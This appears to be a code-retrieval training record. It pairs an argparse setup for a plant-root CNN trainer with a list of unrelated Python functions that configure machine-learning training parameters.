CNN architecture (CNN graph and model summary)' '\nby default, does not save any information.') x = PAR['outdir'] parser.add_argument('-o', '--outdir', action='store', dest='outdir', default=x, help='folder where to save trained model and CNN architecture.' '\ndefault: {}'.format(x)) x = PAR['epochs'] parser.add_argument('-e', '--epochs', action='store', dest='epochs', metavar='NUM', type=int, default=x, help='number of epochs to run.' '\ndefault value: {}'.format(x)) x = PAR['patience'] parser.add_argument('-p', '--patience', action='store', dest='patience', metavar='NUM', type=int, default=x, help='number of epochs to wait before early stopping is triggered.' '\ndefault value: {}'.format(x)) x = PAR['learning_rate'] parser.add_argument('-lr', '--learning_rate', action='store', dest='learning_rate', metavar='NUM', type=int, default=x, help='learning rate used by the Adam optimizer.' '\ndefault value: {}'.format(x)) x = PAR['vfrac'] parser.add_argument('-vf', '--validation_fraction', action='store', dest='vfrac', metavar='N%', type=int, default=x, help='Percentage of tiles used for validation.' '\ndefault value: {}%%'.format(x)) level = parser.add_mutually_exclusive_group() level.add_argument('-1', '--CNN1', action='store_const', dest='level', const=1, help='Train for root colonisation (default)') level.add_argument('-2', '--CNN2', action='store_const', dest='level', const=2, help='Train for fungal hyphal structures.') x = None parser.add_argument('-net', '--network', action='store', dest='model', metavar='H5', type=str, default=x, help='name of the pre-trained network to use as a basis for training.' '\ndefault value: {}'.format(x)) parser.add_argument('-sr', '--super_resolution', action='store_const', dest='super_resolution', const=True, help='Apply super-resolution before predictions.' '\ndefault value: no super-resolution.') x = None parser.add_argument('-g', '--generator', action='store', dest='generator', metavar='H5', type=str, default=x, help='name of the pre-trained generator.' '\ndefault value: {}'.format(x)) x = None parser.add_argument('-d', '--discriminator', action='store', dest='discriminator', metavar='H5', type=str, default=x, help='name of the pre-trained discriminator.' '\ndefault value: {}'.format(x)) x = PAR['input_files'] parser.add_argument('image', nargs='*', default=x, help='plant root image to process.' '\ndefault value: {}'.format(x)) return parser
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def feed_training_args(self):\n return {}", "def add_train_val_arguments(self):\n self.add_train_arguments()\n self.add_val_arguments()", "def add_train_arguments(self):\n parser = self.parser\n parser.add_argument(\"source_dir\", help=\"Directory containing test source images.\")\n parser.add_argument(\"target_dir\", help=\"Directory containing test target images.\")\n parser.add_argument(\"--batch_size\", \"-bs\", default=1, type=int, help=\"Batch size.\")\n parser.add_argument(\"--cycle_loss_weight\", \"-clw\", default=0, type=int, help=\"Cycle loss weight.\")\n parser.add_argument(\n \"--discriminator_architecture\", \"-d\", default=\"basic\",\n help=\"architecture of the discriminator ('basic' | 'N_layers')\"\n )\n parser.add_argument(\n \"--discriminator_filters\", \"-df\", type=int, default=64,\n help=\"Number of filters in the last conv layer of the discriminator.\"\n )\n parser.add_argument(\n \"--n_frames_discriminator\", \"-dn\", type=int, default=0,\n help=\"Number of frames the sequence discriminators discriminate.\"\n )\n parser.add_argument(\n \"--discriminator_temporal_scales\", \"-dts\", type=int, default=1,\n help=\"Number of temporal scales in framerate sampling (= number of sequence discriminators).\"\n )\n parser.add_argument(\n \"--feature_matching_loss_weight\", \"-fmlw\", default=0, type=int, help=\"Loss weight of feature matching.\"\n )\n parser.add_argument(\n \"--flow_loss_weight\", \"-flw\", default=0, type=int, help=\"Loss weight of flow loss in vid2vid.\"\n )\n parser.add_argument(\n \"--gan_mode\", \"-gan\", default=\"lsgan\", help=\"type of the gan loss ('vanilla' | 'lsgan' | 'wgangp').\"\n )\n parser.add_argument(\n \"--init_epoch\", \"-ie\", default=0, type=int, help=\"If set, load models saved at a specific epoch.\"\n )\n parser.add_argument(\n \"--init_checkpoint_dir\", \"-i\",\n help=\"If set, initialize models from saved checkpoints in init_checkpoint_dir.\"\n )\n parser.add_argument(\n \"--log_every\", \"-le\", default=100, type=int, help=\"Log losses and images every log_every iterations.\"\n )\n parser.add_argument(\n \"--log_images_every\", \"-lie\", default=0, type=int,\n help=\"If specified, log images every log_images_every iterations, instead of every log_every iterations.\"\n )\n parser.add_argument(\"--load_height\", \"-lh\", type=int, default=0, help=\"image load height (before cropping).\")\n parser.add_argument(\"--l1_loss_weight\", \"-llw\", default=0, type=int, help=\"L1 loss weight.\")\n parser.add_argument(\"--learning_rate\", \"-lr\", default=0.0002, type=float, help=\"Learning rate.\")\n parser.add_argument(\"--load_width\", \"-lw\", type=int, default=0, help=\"Image load width (before cropping).\")\n parser.add_argument(\n \"--mask_loss_weight\", \"-mlw\", default=0, type=int, help=\"Loss weight of mask loss (weight loss) in vid2vid.\"\n )\n parser.add_argument(\"--num_epochs\", \"-ne\", default=10, type=int, help=\"Number of training epochs.\")\n parser.add_argument(\n \"--perceptual_loss_weight\", \"-plw\", default=0, type=int, help=\"Loss weight of perceptual (VGG19) loss.\"\n )\n parser.add_argument(\n \"--recycle_loss_weight\", \"-rclw\", default=0, type=int, help=\"Loss weight of recycle in RecycleGAN.\"\n )\n parser.add_argument(\n \"--recycle_predictor_architecture\", \"-rcp\", default=\"resnet_6blocks\",\n help=\"Architecture of RecycleGAN predictor. See generator_architecture for options.\"\n )\n parser.add_argument(\n \"--recycle_predictor_filters\", \"-rcpf\", type=int, default=64,\n help=\"Number of filters in the last conv layer of the RecycleGAN predictor.\"\n )\n parser.add_argument(\n \"--save_every\", \"-se\", default=1, type=int, help=\"Save model checkpoints every save_every epochs.\"\n )\n parser.add_argument(\n \"--spatial_scaling\", \"-ss\", default=[1], type=float, nargs='+',\n help=\"Set steps for spatial scaling.\\n\"\n \"I.e. [0.25, 0.5, 1] to train a model with width and height 256 on 64 > 128 > 256 images.\"\n )\n parser.add_argument(\"--timecycle_loss\", \"-tcl\", default=\"l1\", help=\"Timecycle loss ('l1' | 'l2')\")\n parser.add_argument(\"--timecycle_loss_weight\", \"-tclw\", default=0, type=int, help=\"Timecycle loss weight.\")\n parser.add_argument(\n \"--timecycle_motion_model_architecture\", \"-tcmm\", default=\"resnet_1blocks\",\n help=\"Architecture of Timecycle motion model. See generator_architecture for options.\"\n )\n parser.add_argument(\n \"--timecycle_motion_model_filters\", \"-tcmmf\", type=int, default=64,\n help=\"Number of filters in the last conv layer of the Timecycle motion model.\"\n )\n parser.add_argument(\n \"--timecycle_separate_motion_models\", \"-tcsmm\", action=\"store_true\",\n help=\"Set to use separate motion models for forward/backward predictions.\"\n )\n parser.add_argument(\n \"--timecycle_type\", \"-tct\", default=\"conditional\",\n help=\"Type of Timecycle ('conditional' | 'pingpong').\"\n )\n parser.add_argument(\n \"--timecycle_warp_loss_weight\", \"-tcwlw\", default=0, type=int, help=\"Timecycle warp loss weight.\"\n )\n parser.add_argument(\n \"--temporal_scaling\", \"-ts\", default=[1], type=float, nargs='+',\n help=\"Set steps for temporal scaling.\\n\"\n \"I.e. [0.2, 0.6, 1] to train a model with block_size 5 on 1 -> 3 -> 5 frames.\"\n )\n parser.add_argument(\n \"--warp_loss_weight\", \"-wlw\", default=0, type=int, help=\"Loss weight of warp loss in vid2vid.\"\n )", "def set_args(self, args: Namespace) -> None:\n self.epochs = args.epochs\n self.lrdecay = args.lrdecay\n self.lrpatience = args.lrpatience\n self.ntest = args.ntest\n self.ndiscard = args.ndiscard\n self.predict = args.predict\n self.printfreq = args.printfreq\n self.savefreq = args.savefreq\n self.resume = args.resume\n self.seed = args.seed\n self.timesteps = args.timesteps\n self.verbose = args.verbose", "def add_train_args(parser):\n\n # Runtime environment\n runtime = parser.add_argument_group('Environment')\n runtime.add_argument('--dataset', type=str, default=\"searchqa\",\n help='Dataset: searchqa, quasart or unftriviaqa')\n runtime.add_argument('--base_dir', type=str, default=\".\",\n help='base_dir of the pre-processing')", "def modify_train_args(args: Namespace):\n if args.message.startswith('tetra'):\n setattr(args, 'tetra', True)\n else:\n setattr(args, 'tetra', False)\n\n # shuffle=False for custom sampler\n if args.shuffle_pairs:\n setattr(args, 'no_shuffle', True)\n\n setattr(args, 'device', torch.device('cuda' if torch.cuda.is_available() else 'cpu'))", "def create_training_args(self, input_dict, output_dict, exec_properties,\n executor_class_path, training_inputs,\n job_id) -> Dict[Text, Any]:\n pass", "def add_train_args(parser: ArgumentParser):\n # General arguments\n parser.add_argument('--task', type=str, default='regression',\n help='Regression or classification task')\n parser.add_argument('--seed', type=int, default=0,\n help='Random seed to use when splitting data into train/val/test sets.'\n 'When `num_folds` > 1, the first fold uses this seed and all'\n 'subsequent folds add 1 to the seed.')\n parser.add_argument('--data_path', type=str,\n help='Path to data CSV file')\n parser.add_argument('--split_path', type=str,\n help='Path to .npy file containing train/val/test split indices')\n parser.add_argument('--log_dir', type=str, default=None,\n help='Directory where model checkpoints will be saved')\n parser.add_argument('--model_path', type=str, default=None,\n help='Path to model file to load for evaluation time')\n parser.add_argument('--eval_output_dir', type=str, default=None,\n help='Directory to store outputs of evaluation, including predictions and attention visualization')\n\n\n # Training arguments\n parser.add_argument('--epoch', type=int, default=0,\n help='Starting epoch')\n parser.add_argument('--checkpoint_load_path', type=str,\n help='Path to model to load as checkpoint when resuming training')\n parser.add_argument('--checkpoint_dir', type=str,\n help='Path to save checkpoint model')\n parser.add_argument('--viz_dir', type=str,\n help='Path to save attention visualization')\n\n parser.add_argument('--n_epochs', type=int, default=60,\n help='Number of epochs to run')\n parser.add_argument('--batch_size', type=int, default=50,\n help='Batch size')\n parser.add_argument('--warmup_epochs', type=float, default=2.0,\n help='Number of epochs during which learning rate increases linearly from'\n 'init_lr to max_lr. Afterwards, learning rate decreases exponentially'\n 'from max_lr to final_lr.')\n parser.add_argument('--lr', type=float, default=1e-4,\n help='Learning rate')\n parser.add_argument('--num_workers', type=int, default=5,\n help='Number of workers to use in dataloader')\n parser.add_argument('--no_shuffle', action='store_true', default=False,\n help='Whether or not to retain default ordering during training')\n parser.add_argument('--shuffle_pairs', action='store_true', default=False,\n help='Whether or not to shuffle only pairs of stereoisomers')\n\n # Model arguments\n parser.add_argument('--gnn_type', type=str,\n choices=['gin', 'gcn', 'dmpnn', 'orig_dmpnn'],\n help='Type of gnn to use')\n parser.add_argument('--global_chiral_features', action='store_true', default=False,\n help='Use global chiral atom features')\n parser.add_argument('--chiral_features', action='store_true', default=False,\n help='Use local chiral atom features')\n parser.add_argument('--ft_boost', action='store_true', default=False, help='whether to concatenate R/S features after each MP layer')\n parser.add_argument('--hidden_size', type=int, default=32,\n help='Dimensionality of hidden layers')\n parser.add_argument('--depth', type=int, default=2,\n help='Number of message passing steps')\n parser.add_argument('--dropout', type=float, default=0.,\n help='Dropout probability')\n parser.add_argument('--graph_pool', type=str, default='sum',\n choices=['sum', 'mean', 'max', 'attn', 'set2set'],\n help='How to aggregate atom representations to molecule representation')\n parser.add_argument('--message', type=str, default='sum',\n choices=['sum', 'tetra_pd', 'tetra_permute', 'tetra_permute_concat'],\n help='How to pass neighbor messages')\n parser.add_argument('--n_layers', type=int, default=2,\n help='Number of final FFN layers')\n parser.add_argument('--skip_coef', type=float, default=1.,\n help='How much information retained in skip connections')\n\n # Attention arguments\n parser.add_argument('--attn_type', type=str, default='gat', choices=['gat', 'tang'],\n help='Attention type. GAT or that used in Tang 2020')\n parser.add_argument('--gat_act', type=str, default='leakyrelu',\n choices=['leakyrelu', 'relu'], help='Activation function used in GAT')\n parser.add_argument('--alpha', type=float, default=0.01,\n help='Alpha used in leakyReLU in GAT')\n parser.add_argument('--gat_depth', type=int, default=2,\n help='number of GAT attention layers')\n parser.add_argument('--heads', type=int, default=3,\n help='Number of attention heads')\n parser.add_argument('--attn_dropout', type=float, default=0.,\n help='Dropout probability for attention')\n parser.add_argument('--concat', action='store_true', default=False,\n help='concatenate heads or take average in multihead attention')", "def add_train_args(parser):\n parser.register('type', 'bool', str2bool)\n # Runtime environment\n runtime = parser.add_argument_group('Environment')\n runtime.add_argument('--no-cuda', type='bool', default=False,\n help='Train on CPU, even if GPUs are available.')\n runtime.add_argument('--gpu', type=int, default=-1,\n help='Run on a specific GPU')\n runtime.add_argument('--data-workers', type=int, default=5,\n help='Number of subprocesses for data loading')\n runtime.add_argument('--random-seed', type=int, default=1013,\n help=('Random seed for all numpy/torch/cuda '\n 'operations (for reproducibility)'))\n runtime.add_argument('--num-epochs', type=int, default=40,\n help='Train data iterations')\n runtime.add_argument('--batch-size', type=int, default=32,\n help='Batch size for training')\n runtime.add_argument('--dev-batch-size', type=int, default=16,\n help='Batch size for training')\n\n # Files\n files = parser.add_argument_group('Filesystem')\n files.add_argument('--model-dir', type=str, default=MODEL_DIR,\n help='Directory for saved models/checkpoints/logs')\n files.add_argument('--model-name', type=str, default='',\n help='Unique model identifier (.mdl, .txt, .checkpoint)')\n files.add_argument('--data-dir', type=str, default=DATA_DIR,\n help='Directory of training/validation data')\n files.add_argument('--train-file', type=str,\n default='train_processed.jsonl',\n help='Preprocessed train file')\n files.add_argument('--dev-file', type=str,\n default='dev_processed.jsonl',\n help='Preprocessed dev file')\n files.add_argument('--embed-dir', type=str, default=EMBED_DIR,\n help='Directory of pre-trained embedding files')\n files.add_argument('--embedding-file', type=str,\n default='glove.840B.300d.txt',\n help='Space-separated pretrained embeddings file')\n\n # Saving + loading\n save_load = parser.add_argument_group('Saving/Loading')\n save_load.add_argument('--checkpoint', type='bool', default=False,\n help='Save model + optimizer state after each epoch')\n save_load.add_argument('--pretrained', type=str, default='',\n help='Path to a pretrained model to warm-start with')\n\n # General\n general = parser.add_argument_group('General')\n general.add_argument('--display-iter', type=int, default=25,\n help='Log state after every <display_iter> epochs')\n general.add_argument('--display-samples', type='bool', default=True,\n help='Display top 5 samples in validation process.')\n general.add_argument('--sort-by-len', type='bool', default=True,\n help='Sort batches by length for speed')\n \n # Model architecture\n model = parser.add_argument_group('Model Architecture')\n model.add_argument('--decoder-type', type=str, default='copy',\n help='Decoder architecture type')\n model.add_argument('--vocab-limit', type=int, default=-1,\n help='Limit for vocab creation')\n model.add_argument('--use-extended-vocab', type='bool', default=True,\n help='Use extended vocab for copying')\n model.add_argument('--embedding-dim', type=int, default=300,\n help='Embedding size if embedding_file is not given')\n model.add_argument('--hidden-size', type=int, default=128,\n help='Hidden size of RNN units')\n model.add_argument('--rnn-type', type=str, default='lstm',\n help='RNN type: LSTM, GRU, or RNN')\n\n # Optimization details\n optim = parser.add_argument_group('Optimization')\n optim.add_argument('--optimizer', type=str, default='adam',\n help='Optimizer: sgd or adam')\n optim.add_argument('--learning-rate', type=float, default=0.1,\n help='Learning rate')\n optim.add_argument('--weight-decay', type=float, default=0,\n help='Weight decay factor')\n optim.add_argument('--momentum', type=float, default=0,\n help='Momentum factor')\n optim.add_argument('--fix-embeddings', type='bool', default=True,\n help='Keep word embeddings fixed (use pretrained)')\n optim.add_argument('--rnn-padding', type='bool', default=False,\n help='Explicitly account for padding in RNN encoding')\n optim.add_argument('--max-length', type=int, default=30,\n help='The max span allowed during decoding')", "def get_train_args():\n d_train = cfg.get_train_args_schema().fields\n \n if num_local_gpus == 0:\n d_train['num_gpus'] = fields.Int(missing=0,\n description= 'Number of GPUs to train on \\\n (one node only). If set to zero, CPU is used.',\n required= False\n )\n else:\n num_gpus = [0]\n for i in range(num_local_gpus): num_gpus.append(str(i+1))\n d_train['num_gpus'] = fields.Int(missing=1,\n description= 'Number of GPUs to train on \\\n (one node only). If set to zero, \\\n CPU is used.',\n enum = num_gpus,\n required= False\n )\n\n # dictionary sorted by key, \n # https://docs.python.org/3.6/library/collections.html#ordereddict-examples-and-recipes\n train_args = OrderedDict(sorted(d_train.items(), key=lambda t: t[0]))\n\n return train_args", "def train_input_args():\n # Create Parse using ArgumentParser\n parser = argparse.ArgumentParser()\n parser.add_argument('data_dir', type = str, help = 'Path to the data directory') \n parser.add_argument('--lr', type = float, default = 0.001, help = 'Learning rate (0.001)') \n parser.add_argument('--model', type = str, default = 'vgg16', help = 'TorchVision VGG model used: vgg19 or (vgg16)') \n parser.add_argument('--hidden', type = int, default = 4096, help = 'Number of hidden units (4096)') \n parser.add_argument('--epochs', type = int, default = 8, help = 'Number of training epochs (8)') \n parser.add_argument('--gpu', type = bool, default = True, help = '(True) = GPU enabled, False = GPU disabled') \n parser.add_argument('--chk', type = str, default = 'checkpoint', help = 'Checkpoint folder name') \n return parser.parse_args()", "def required_parameters(self):\n return ['seed', 'run_params']", "def add_args(parser):\n # fmt: off\n parser.add_argument('data', help='colon separated path to data directories list, \\\n will be iterated upon during epochs in round-robin manner')\n parser.add_argument('-s', '--source-lang', default=None, metavar='SRC',\n help='source language')\n parser.add_argument('-t', '--target-lang', default=None, metavar='TARGET',\n help='target language')\n parser.add_argument('--lazy-load', action='store_true',\n help='load the dataset lazily')\n parser.add_argument('--raw-text', action='store_true',\n help='load raw text dataset')\n parser.add_argument('--left-pad-source', default='True', type=str, metavar='BOOL',\n help='pad the source on the left')\n parser.add_argument('--left-pad-target', default='False', type=str, metavar='BOOL',\n help='pad the target on the left')\n parser.add_argument('--max-source-positions', default=1024, type=int, metavar='N',\n help='max number of tokens in the source sequence')\n parser.add_argument('--max-target-positions', default=1024, type=int, metavar='N',\n help='max number of tokens in the target sequence')\n parser.add_argument('--upsample-primary', default=1, type=int,\n help='amount to upsample primary dataset')\n # fmt: on\n parser.add_argument('--main-src-wordfreq', default=None, type=str,\n help='word frequency file of the main train source')\n parser.add_argument('--dialect-src-wordfreq', default=None, type=str,\n help='word frequency file of the dialect train source')\n parser.add_argument('--dialect-tau', default=1., type=float)\n parser.add_argument('--src-gradnorm-tau', default=1., type=float)\n parser.add_argument('--lm-path', default=None, type=str)\n parser.add_argument('--lm-dict-path', default=None, type=str)\n parser.add_argument('--lm-topk', default=0, type=int)\n parser.add_argument('--src-gradnorm-path', default=None, type=str)\n parser.add_argument('--src-gradnorm-nosoftmax', action='store_true')\n parser.add_argument('--exclude-self', action='store_true')", "def define_parameters(self):\n self.add_argument('--prefix', dest='prefix', type=str, optional=False,\n help='prefix for file names')\n self.add_argument('--sleepLength',\n dest = 'sleepLength',\n type = str,\n optional = True,\n help ='time to sleep before performing plugin action',\n default = '0')", "def parse_train_args() -> Namespace:\n parser = ArgumentParser()\n add_train_args(parser)\n args = parser.parse_args()\n modify_train_args(args)\n\n return args", "def get_arguments():\n parser = argparse.ArgumentParser(description=\"DeepLabLFOV Network Inference.\")\n parser.add_argument(\"--train_set\", type=str, default=\"drill\",\n help=\"Number of classes to predict (including background).\")\n args = parser.parse_args()\n train_set = args.train_set\n\n #test_set = \"drill_11_test_scenes\"\n\n NUM_CLASSES = 8\n SAVE_DIR = './testing_softmax_output/'\n DATA_DIR = '/'\n DATA_LIST_PATH = '/home/peteflo/spartan/src/CorlDev/experiments/sixobjects_multi_test_scenes.txt.imglist.txtdownsampled10.txt'\n DATA_DIRECTORY = ''\n IGNORE_LABEL = 255\n RESTORE_FROM = './snapshots_' + train_set + '/model.ckpt-20000'\n \n parser.add_argument(\"--num-classes\", type=int, default=NUM_CLASSES,\n help=\"Number of classes to predict (including background).\")\n parser.add_argument(\"--save-dir\", type=str, default=SAVE_DIR,\n help=\"Where to save predicted mask.\")\n parser.add_argument(\"--data-list\", type=str, default=DATA_LIST_PATH,\n help=\"Path to the file listing the images in the dataset.\")\n parser.add_argument(\"--data-dir\", type=str, default=DATA_DIRECTORY,\n help=\"Path to the directory containing the PASCAL VOC dataset.\")\n parser.add_argument(\"--ignore-label\", type=int, default=IGNORE_LABEL,\n help=\"The index of the label to ignore during the training.\")\n parser.add_argument(\"--restore-from\", type=str, default=RESTORE_FROM,\n help=\"Where restore model parameters from.\")\n return parser.parse_args()", "def args():\n\n parser = argparse.ArgumentParser(description=\"Train a maximum entropy model.\")\n parser.add_argument(\"-N\", \"--ngram\", metavar=\"N\", dest=\"ngram\", type=int, default=3, help=\"The length of ngram to be considered (default 3).\")\n parser.add_argument(\"datafile\", type=str,\n help=\"The file name containing the features.\")\n parser.add_argument(\"modelfile\", type=str,\n help=\"The name of the file to which you write the trained model.\")\n args = parser.parse_args()\n\n return args.datafile, args.ngram, args.modelfile", "def set_training_parameters(\n self,\n config: ConfigDict,\n len_train: int,\n len_test: int,\n ):\n self.configure_steps(config, len_train, len_test)\n self.configure_reporting(config)\n self.configure_training_functions(config)", "def load_arguments(parser):\n\n\t# paths\n\tparser.add_argument('--train_path_src', type=str, required=True, help='train src dir')\n\tparser.add_argument('--train_path_tgt', type=str, required=True, help='train tgt dir')\n\tparser.add_argument('--path_vocab_src', type=str, required=True, help='vocab src dir')\n\tparser.add_argument('--path_vocab_tgt', type=str, required=True, help='vocab tgt dir')\n\tparser.add_argument('--dev_path_src', type=str, default=None, help='dev src dir')\n\tparser.add_argument('--dev_path_tgt', type=str, default=None, help='dev tgt dir')\n\tparser.add_argument('--save', type=str, required=True, help='model save dir')\n\tparser.add_argument('--load', type=str, default=None, help='model load dir')\n\tparser.add_argument('--load_embedding_src', type=str, default=None, help='pretrained src embedding')\n\tparser.add_argument('--load_embedding_tgt', type=str, default=None, help='pretrained tgt embedding')\n\tparser.add_argument('--train_attscore_path', type=str, default=None, help='train set reference attention scores')\n\tparser.add_argument('--dev_attscore_path', type=str, default=None, help='dev set reference attention scores')\n\n\t# model\n\tparser.add_argument('--embedding_size_enc', type=int, default=200, help='encoder embedding size')\n\tparser.add_argument('--embedding_size_dec', type=int, default=200, help='decoder embedding size')\n\tparser.add_argument('--hidden_size_enc', type=int, default=200, help='encoder hidden size')\n\tparser.add_argument('--num_bilstm_enc', type=int, default=2, help='number of encoder bilstm layers')\n\tparser.add_argument('--num_unilstm_enc', type=int, default=0, help='number of encoder unilstm layers')\n\tparser.add_argument('--hidden_size_dec', type=int, default=200, help='encoder hidden size')\n\tparser.add_argument('--num_unilstm_dec', type=int, default=2, help='number of encoder bilstm layers')\n\tparser.add_argument('--hard_att', type=str, default='False', help='use hard attention or not')\n\tparser.add_argument('--att_mode', type=str, default='bahdanau', \\\n\t\t\t\t\t\t\thelp='attention mechanism mode - bahdanau / hybrid / dot_prod')\t\n\tparser.add_argument('--hidden_size_att', type=int, default=1, \\\n\t\t\t\t\t\t\thelp='hidden size for bahdanau / hybrid attention')\n\tparser.add_argument('--hidden_size_shared', type=int, default=200, \\\n\t\t\t\t\t\t\thelp='transformed att output hidden size (set as hidden_size_enc)')\n\tparser.add_argument('--additional_key_size', type=int, default=0, \\\n\t\t\t\t\t\t\thelp='additional attention key size: keys = [values, add_feats]')\n\n\t# train \n\tparser.add_argument('--random_seed', type=int, default=666, help='random seed')\t\n\tparser.add_argument('--max_seq_len', type=int, default=32, help='maximum sequence length')\n\tparser.add_argument('--batch_size', type=int, default=64, help='batch size')\t\n\tparser.add_argument('--embedding_dropout', type=float, default=0.0, help='embedding dropout')\n\tparser.add_argument('--dropout', type=float, default=0.0, help='dropout')\n\tparser.add_argument('--num_epochs', type=int, default=10, help='number of training epoches')\n\tparser.add_argument('--learning_rate', type=float, default=0.001, help='learning rate')\n\tparser.add_argument('--residual', type=str, default='False', help='residual connection')\n\tparser.add_argument('--max_grad_norm', type=float, default=1.0, help='optimiser gradient norm clipping: max grad norm')\t\n\tparser.add_argument('--batch_first', type=str, default='True', help='batch as the first dimension')\n\tparser.add_argument('--use_gpu', type=str, default='False', help='whether or not using GPU')\n\tparser.add_argument('--eval_with_mask', type=str, default='True', help='calc loss excluding padded words')\n\tparser.add_argument('--scheduled_sampling', type=str, default='False', \\\n\t\t\t\t\t \t\thelp='gradually turn off teacher forcing \\\n\t\t\t\t\t \t\t(if True, use teacher_forcing_ratio as the starting point)')\n\n\t# teacher forcing / attention forcing / dual\n\tparser.add_argument('--train_mode', type=str, default='dual', help='train mode; multi | dual | afdynamic')\n\tparser.add_argument('--load_tf', type=str, default=None, help='used with train_mode=af; tf model load dir')\n\tparser.add_argument('--teacher_forcing_ratio', type=float, default=1.0, help='ratio of teacher forcing')\n\tparser.add_argument('--attention_forcing', type=str, default='False', help='whether or not using attention forcing')\n\tparser.add_argument('--attention_loss_coeff', type=float, default=1.0, \\\n\t\t\t\t\t\t\thelp='attention loss coeff, ignored if attention_forcing=False')\n\t\n\t# save and print\n\tparser.add_argument('--checkpoint_every', type=int, default=10, help='save ckpt every n steps')\t\n\tparser.add_argument('--print_every', type=int, default=10, help='print every n steps')\t\n\n\treturn parser", "def apply_args(self):\n\n args = self.args\n\n Test.compile_only = args.compile_only\n Test.skip_comparison = args.skip_comparison\n Test.global_tolerance = args.tolerance\n Test.global_abs_tolerance = args.abs_tolerance\n Test.global_particle_tolerance = args.particle_tolerance\n Test.performance_params = args.check_performance", "def define_parameters(self):", "def _setup_arguments(self):\n\n self._parser.add_argument(\"-a\", \"--area-interest\",\n help=\"Area of interest to process, \"\n \"shapefile path\", required=True)\n # FUTURE VERSIONS\n # self._parser.add_argument(\"-s\", \"--srtm-dem\",\n # help=\"Path to SRTM DEM file. Zip format\",\n # required=False)\n # self._parser.add_argument(\"-y\", \"--hsheds-dem\",\n # help=\"Path to HSHEDS DEM file. Zip format\",\n # required=False)\n # self._parser.add_argument(\"-g\", \"--groves-file\",\n # help=\"Path to groves classification file. \"\n # \"Zip format\",\n # required=False)", "def __init__(self, epsilon=0.05,gamma=0.8,alpha=0.2, numTraining=0, **args):\n args['epsilon'] = epsilon\n args['gamma'] = gamma\n args['alpha'] = alpha\n args['numTraining'] = numTraining\n QLearningAgent.__init__(self, **args)", "def __init__(self, *args, **kwargs):\n self.classes = [0,1] # (default to 0/1; replace during training)\n self.theta = np.array([]) # placeholder value before training\n\n if len(args) or len(kwargs): # if we were given optional arguments,\n self.train(*args,**kwargs) # just pass them through to \"train\"", "def training_config_parser():\n parser = argparse.ArgumentParser()\n\n # xml_annotation_path, csv_annotation_path, oxford_annotations_path, oxford_images_path\n # Dataset info\n parser.add_argument(\n \"--xml_annotation_path\", type=str, required=True\n )\n parser.add_argument(\n \"--csv_annotation_path\", type=str, required=True\n )\n parser.add_argument(\n \"--oxford_annotations_path\", type=str, required=True\n )\n parser.add_argument(\n \"--oxford_images_path\", type=str, required=True\n )\n \n parser.add_argument(\n \"--background_class\",\n type=int,\n required=False,\n default=0,\n help=\"Default background class\",\n )\n\n # What to train\n parser.add_argument(\n \"--train_backbone\",\n action=\"store_true\",\n required=False,\n default=False,\n help=\"Train backbone\",\n )\n parser.add_argument(\n \"--train_transformers\",\n action=\"store_true\",\n required=False,\n default=False,\n help=\"Train transformers\",\n )\n parser.add_argument(\n \"--train_nlayers\",\n action=\"store_true\",\n required=False,\n default=False,\n help=\"Train new layers\",\n )\n\n # How to train\n parser.add_argument(\n \"--finetuning\",\n default=False,\n required=False,\n action=\"store_true\",\n help=\"Load the model weight before to train\",\n )\n parser.add_argument(\n \"--batch_size\",\n type=int,\n required=False,\n default=1,\n help=\"Batch size to use to train the model\",\n )\n parser.add_argument(\n \"--gradient_norm_clipping\",\n type=float,\n required=False,\n default=0.1,\n help=\"Gradient norm clipping\",\n )\n parser.add_argument(\n \"--target_batch\",\n type=int,\n required=False,\n default=None,\n help=\"When running on a single GPU, aggretate the gradient before to apply.\",\n )\n\n # Learning rate\n parser.add_argument(\n \"--backbone_lr\", type=bool, required=False, default=1e-5, help=\"Train backbone\"\n )\n parser.add_argument(\n \"--transformers_lr\",\n type=bool,\n required=False,\n default=1e-4,\n help=\"Train transformers\",\n )\n parser.add_argument(\n \"--nlayers_lr\", type=bool, required=False, default=1e-4, help=\"Train new layers\"\n )\n\n return parser", "def add_args(parser):\n parser.add_argument(\"data\", metavar=\"FILE\", help=\"file prefix for data\")\n parser.add_argument(\n \"--num-classes0\",\n type=int,\n default=-1,\n help=\"number of classes0\",\n )\n parser.add_argument(\"--no-shuffle\", action=\"store_true\", default=False)", "def __init__(self, *args, **kwargs):\n # Initializing the test & training set\n self._x_train = kwargs['X_train']\n self._y_train = kwargs['Y_train']\n self._x_test = kwargs['X_test']\n self._y_test = kwargs['Y_test']\n\n self.num_iteration = kwargs['num_iteration']\n self.learning_rate = kwargs['learning_rate']", "def setup_args():\n parser = ParlaiParser()\n parser.add_argument(\n '-n',\n '--num-episodes',\n default=-1,\n type=int,\n help='Total number of episodes to convert, -1 to convert all examples',\n )\n parser.add_argument(\n '-of',\n '--outfile',\n default=None,\n type=str,\n help='Output file where to save, by default will be created in /tmp',\n )\n parser.add_argument(\n '-s1id', '--speaker-0-id', type=str, help='Speaker id of agent who speaks first'\n )\n parser.add_argument(\n '-s1id',\n '--speaker-1-id',\n type=str,\n help='Speaker id of agent who speaks second',\n )\n parser.add_argument(\n '--prepended-context',\n type='bool',\n default=False,\n help='specify if the context is prepended to the first act',\n )\n parser.add_argument('-ltim', '--log-every-n-secs', type=float, default=10)\n parser.set_defaults(datatype='train:ordered')\n\n return parser", "def pre_build_args(self, args):\n args = super(SubtitlesTrainer, self).pre_build_args(args)\n # Set up method specific model and training args\n if args.method in ['b-skip', 'f-skip', 'b-mask', 'f-mask']:\n # No direct connection from features to z in encoder\n args.model_args['feat_to_z'] = True\n # Do not add unimodal ELBO training loss for RNN methods\n args.train_args['uni_loss'] = True\n return args", "def default_training_params():\n N_EPOCHS = 100\n BATCH_SIZE = 64\n EPSILON = 0.0001\n return N_EPOCHS, BATCH_SIZE, EPSILON", "def parse_args(self):\n\n dict_args = dict()\n dict_args['hid'] = 64 # size of each hidden layer\n dict_args['l'] = 2 # number of layers\n\n dict_args['seed'] = 0 # Discard as this will cause identical results for PLA\n dict_args['cpu'] = 4 # MPI\n dict_args['exp_name'] = 'ppo'\n\n dict_args['epochs'] = 1000\n dict_args['steps_per_epoch'] = 25 # default 4000\n dict_args['pi_lr'] = 3e-4\n dict_args['vf_lr'] = 1e-3\n dict_args['train_pi_iters'] = 5 # default 80\n dict_args['train_v_iters'] = 5 # default 80\n dict_args['max_ep_len'] = 25 # default 1000, this needs to be the same as steps_per_epoch for Unity environment\n dict_args['target_kl'] = 0.01\n 